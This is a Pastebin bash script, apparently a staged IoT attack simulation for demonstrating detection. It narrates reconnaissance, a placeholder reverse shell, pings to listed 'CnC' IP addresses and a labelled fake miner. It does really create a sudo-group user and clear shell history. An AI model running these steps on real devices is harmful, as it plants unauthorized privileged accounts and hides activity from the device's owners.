SHARE
TWEET

attackPayload

IoTSecurity Oct 23rd, 2019 (edited) 177 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  4. # arguments
  5. INTERACTIVE=true
  6.  
  7. function interactiveCheckpoint {
  8.     if [ "$INTERACTIVE" = true ]
  9.     then
  10.         echo "Press [Enter] to continue attack"
  11.         read continue
  12.     fi
  13. }
  14.  
  15.  
  16. function attack {
  17.     # Local host reconnaissance detected
  18.     echo "###################################################################"
  19.     echo "           Getting device information                              "
  20.     echo "###################################################################"
  21.         echo $(date -u) " Conducting analysis of host data..."
  22.         uname -a -v -n
  23.         echo $(date -u) " Got host data"
  24.  
  25.     # Detected suspicious use of the useradd command
  26.     echo "###################################################################"
  27.     echo "           Create User and Escalate Privilege                           "
  28.     echo "###################################################################"
  29.  
  30.         USER="privilegeduser"${RANDOM}""
  31.  
  32.         echo $(date -u) " Adding user named ${USER} with privilege root to the system..."
  33.         useradd $USER
  34.         sudo usermod -aG sudo $USER
  35.         echo $(date -u) " Successfully added user named "${USER}" with privilege root to the system"
  36.  
  37.     echo -e "\e[01;32m$(toilet -f pagga "3 C&C Connected")\e[00m"
  38.     interactiveCheckpoint
  39.  
  40.     # Reverse shells, Suspicious IP address communication
  41.     echo "###################################################################"
  42.     echo "           Communicating with CnC for getting attack commands           "
  43.     echo "###################################################################"
  44.  
  45.         echo $(date -u) " Opening reverse shell..."
  46.         bash /dev/tcp/ 2> /dev/null
  47.         echo $(date -u) " Reverse shell established"
  48.  
  49.         echo $(date -u) " Communicating with CnC server..."
  50.         ping -c1 209.17.96.18 > pingtoCnC.txt
  51.         ping -c1 209.17.96.106 > pingtoCnC.txt
  52.         ping -c1 209.17.96.234 > pingtoCnC.txt
  53.         ping -c1 106.51.80.198 > pingtoCnC.txt
  54.  
  55.         echo $(date -u) " Listening to CnC for future attack commands..."
  56.  
  57.     # Removal of system logs files detected
  58.     echo "###################################################################"
  59.     echo "           Covering Tracks - Deleting Logs and Executables         "
  60.     echo "###################################################################"
  61.  
  62.         echo $(date -u) " Deleting history files..."
  63.         history -c
  64.         echo $(date -u) " Deleted history files"
  65.  
  66.     # Crypto Coin Miner
  67.     echo "###################################################################"
  68.     echo "           Installing (Fake) Crypto Currency miner                 "
  69.     echo "###################################################################"
  70.  
  71.         echo $(date -u) " Setting up crypto miner..."
  72.         echo $(date -u) " Cloning into 'cpuminer'..."
  73.         git clone https://github.com/cpuminer 2> /dev/null
  74.         echo $(date -u) " Mining crypto with device resources"
  75. }
  76.  
  77.  
  78. POSITIONAL=()
  79. while [[ $# -gt 0 ]]
  80. do
  81.     key="$1"
  82. case $key in
  83.     -ni|--non-interactive)
  84.         INTERACTIVE=false
  85.         shift
  86.         shift
  87.     ;;
  88.     -h|--help)
  89.         usage
  90.         exit 0
  91.     ;;
  92.     *)
  93.         # unknown option
  94.         # save it in an array for later
  95.         POSITIONAL+=("$1")
  96.         shift
  97.     ;;
  98. esac
  99. done
  100. set -- "${POSITIONAL[@]}" # restore positional parameters
  101.  
  102. attack
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top